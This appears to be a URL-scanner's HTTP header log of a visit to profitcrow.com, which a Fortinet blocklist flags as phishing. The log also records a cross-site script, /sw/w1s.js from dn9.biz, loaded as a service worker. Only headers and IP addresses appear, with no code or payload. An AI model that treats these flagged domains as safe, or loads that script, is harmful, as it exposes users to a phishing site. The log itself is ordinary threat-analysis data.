User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/wp-content/uploads/elementor/css/post-6.css
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: image/png
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:05 GMT
last-modified: Tue, 29 Mar 2022 07:12:45 GMT
accept-ranges: bytes
content-length: 162283
date: Fri, 25 Nov 2022 22:08:05 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /sw/w1s.js HTTP/1.1 
Host: dn9.biz
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://blueskymotions.net/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache

                                         195.154.50.108
HTTP/2 200 OK
content-type: application/javascript; charset=UTF-8
                                        
server: nginx
date: Fri, 25 Nov 2022 22:08:07 GMT
access-control-allow-origin: *
expires: Sat, 25 Nov 2023 22:08:07 GMT
cache-control: max-age=31536000
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET / HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

                                         162.213.255.22
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
x-powered-by: PHP/7.2.34
set-cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447; expires=Fri, 02-Dec-2022 22:08:03 GMT; Max-Age=604800; path=/; secure
cache-control: max-age=3600, must-revalidate
hummingbird-cache: Served
content-encoding: br
vary: Accept-Encoding
date: Fri, 25 Nov 2022 22:08:03 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /2.0/?path=fxmarkethours/index&showHeader=false&displayMainMenu=true&displayTimezoneChange=true&displayInstrumentChange=true&displaySpreadIndicator=true&displayVolumeIndicator=true&displayVolatilityIndicator=true&displayFollowButton=true&allowTimezoneChange=true&allowInstrumentChange=true&defaultTimezone=0&showIndicator=0&defaultFollowMode=false&worldMapColor=red&hoursBackground=%23444f5f&hoursActiveBackground=%237d92b0&hoursTextColor=%23ffffff&currentHourBGColor=%23f9fdff&dstHourColor=%230cf6ff&indicatorBarColor=%235090c6&graphPointsColor=%23ffffff&spreadTopGraphColor=%23208c1c&spreadBottomGraphColor=%23dc0e0e&volatilityGraphColor=%23146fba&availableInstruments=l%3A&instrument=EUR/USD&width=743&height=466&adv=popup&lang=en HTTP/1.1 
Host: freeserv.dukascopy.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         194.8.15.120
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx
date: Fri, 25 Nov 2022 22:08:05 GMT
content-encoding: gzip
vary: Accept-Encoding
strict-transport-security: max-age=63072000; includeSubDomains
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /wp-content/uploads/2021/12/financial-data.png HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/wp-content/uploads/elementor/css/post-6.css
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: image/png
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:05 GMT
last-modified: Wed, 29 Dec 2021 04:37:03 GMT
accept-ranges: bytes
content-length: 1313979
date: Fri, 25 Nov 2022 22:08:05 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /2.0/?path=intraday_movers_and_shakers/index&headingColor=%23000000&dateColor=%23000000&valueColor=%23000000&bgColor=%23ffffff&width=100%25&height=100%25&adv=popup HTTP/1.1 
Host: freeserv.dukascopy.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         194.8.15.120
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx
date: Fri, 25 Nov 2022 22:08:05 GMT
content-encoding: gzip
vary: Accept-Encoding
strict-transport-security: max-age=63072000; includeSubDomains
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /2.0/v/0.42.63/rsindex/rsindex.js HTTP/1.1 
Host: freeserv-static.dukascopy.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://freeserv.dukascopy.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-site
TE: trailers

                                         104.22.7.183
HTTP/2 200 OK
content-type: application/javascript
                                        
date: Fri, 25 Nov 2022 22:08:05 GMT
last-modified: Tue, 03 May 2022 08:54:50 GMT
vary: Accept-Encoding
etag: W/"6270edda-20e97"
expires: Fri, 02 Dec 2022 13:56:25 GMT
cache-control: max-age=604800
content-encoding: gzip
strict-transport-security: max-age=63072000; includeSubDomains
cf-cache-status: HIT
age: 29500
server: cloudflare
cf-ray: 76fdb373bfbafac8-OSL
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /2.0/index.php?path=common/translation&lang=en HTTP/1.1 
Host: freeserv.dukascopy.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://freeserv.dukascopy.com/2.0/?path=fxmarkethours/index&showHeader=false&displayMainMenu=true&displayTimezoneChange=true&displayInstrumentChange=true&displaySpreadIndicator=true&displayVolumeIndicator=true&displayVolatilityIndicator=true&displayFollowButton=true&allowTimezoneChange=true&allowInstrumentChange=true&defaultTimezone=0&showIndicator=0&defaultFollowMode=false&worldMapColor=red&hoursBackground=%23444f5f&hoursActiveBackground=%237d92b0&hoursTextColor=%23ffffff&currentHourBGColor=%23f9fdff&dstHourColor=%230cf6ff&indicatorBarColor=%235090c6&graphPointsColor=%23ffffff&spreadTopGraphColor=%23208c1c&spreadBottomGraphColor=%23dc0e0e&volatilityGraphColor=%23146fba&availableInstruments=l%3A&instrument=EUR/USD&width=743&height=466&adv=popup&lang=en
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         194.8.15.120
HTTP/2 200 OK
content-type: text/javascript; charset=UTF-8
                                        
server: nginx
date: Fri, 25 Nov 2022 22:08:05 GMT
content-encoding: gzip
vary: Accept-Encoding
strict-transport-security: max-age=63072000; includeSubDomains
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /wp-content/uploads/2022/03/financial-data.png HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/wp-content/uploads/elementor/css/post-6.css
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: image/png
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:05 GMT
last-modified: Tue, 29 Mar 2022 07:10:26 GMT
accept-ranges: bytes
content-length: 217808
date: Fri, 25 Nov 2022 22:08:05 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /sw/w1s.js HTTP/1.1 
Host: dn9.biz
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Service-Worker: script
Connection: keep-alive
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         62.210.10.215
HTTP/2 200 OK
content-type: application/javascript; charset=UTF-8
                                        
server: nginx
date: Fri, 25 Nov 2022 22:08:09 GMT
access-control-allow-origin: *
expires: Sat, 25 Nov 2023 22:08:09 GMT
cache-control: max-age=31536000
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
GET /2.0/core.js HTTP/1.1
Host: freeserv-static.dukascopy.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

104.22.7.183
HTTP/2 200 OK
content-type: application/javascript
date: Fri, 25 Nov 2022 22:08:04 GMT
last-modified: Thu, 01 Aug 2019 13:33:11 GMT
vary: Accept-Encoding
etag: W/"5d42ea17-6e6"
expires: Mon, 28 Nov 2022 17:10:15 GMT
cache-control: max-age=604800
content-encoding: gzip
strict-transport-security: max-age=63072000; includeSubDomains
cf-cache-status: HIT
age: 363469
server: cloudflare
cf-ray: 76fdb3690b35fac8-OSL
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
GET /2.0/?path=runboard/index&instruments=EUR/USD%2CUSD/JPY%2CGBP/USD%2CEUR/JPY%2CGBP/JPY%2CUSD/CAD%2CXAU/USD%2CAUD/USD%2CUSD/CHF%2CNZD/USD%2CE_Brent%2CE_SandP-500%2CE_DJE50XX%2CE_N225Jap&showDelta=true&showDeltaPercent=true&animationSpeed=100000&fontSize=12&fontFamily=Verdana%2C%20Geneva%2C%20sans-serif&instrumentColor=%23666666&priceColor=%23000000&delimeterColor=%230000FF&bgColor=%23FFFFFF&width=100%25&padding=30px&height=30&adv=popup HTTP/1.1
Host: freeserv.dukascopy.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

194.8.15.120
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
server: nginx
date: Fri, 25 Nov 2022 22:08:05 GMT
content-encoding: gzip
vary: Accept-Encoding
strict-transport-security: max-age=63072000; includeSubDomains
X-Firefox-Spdy: h2


--- Additional Info ---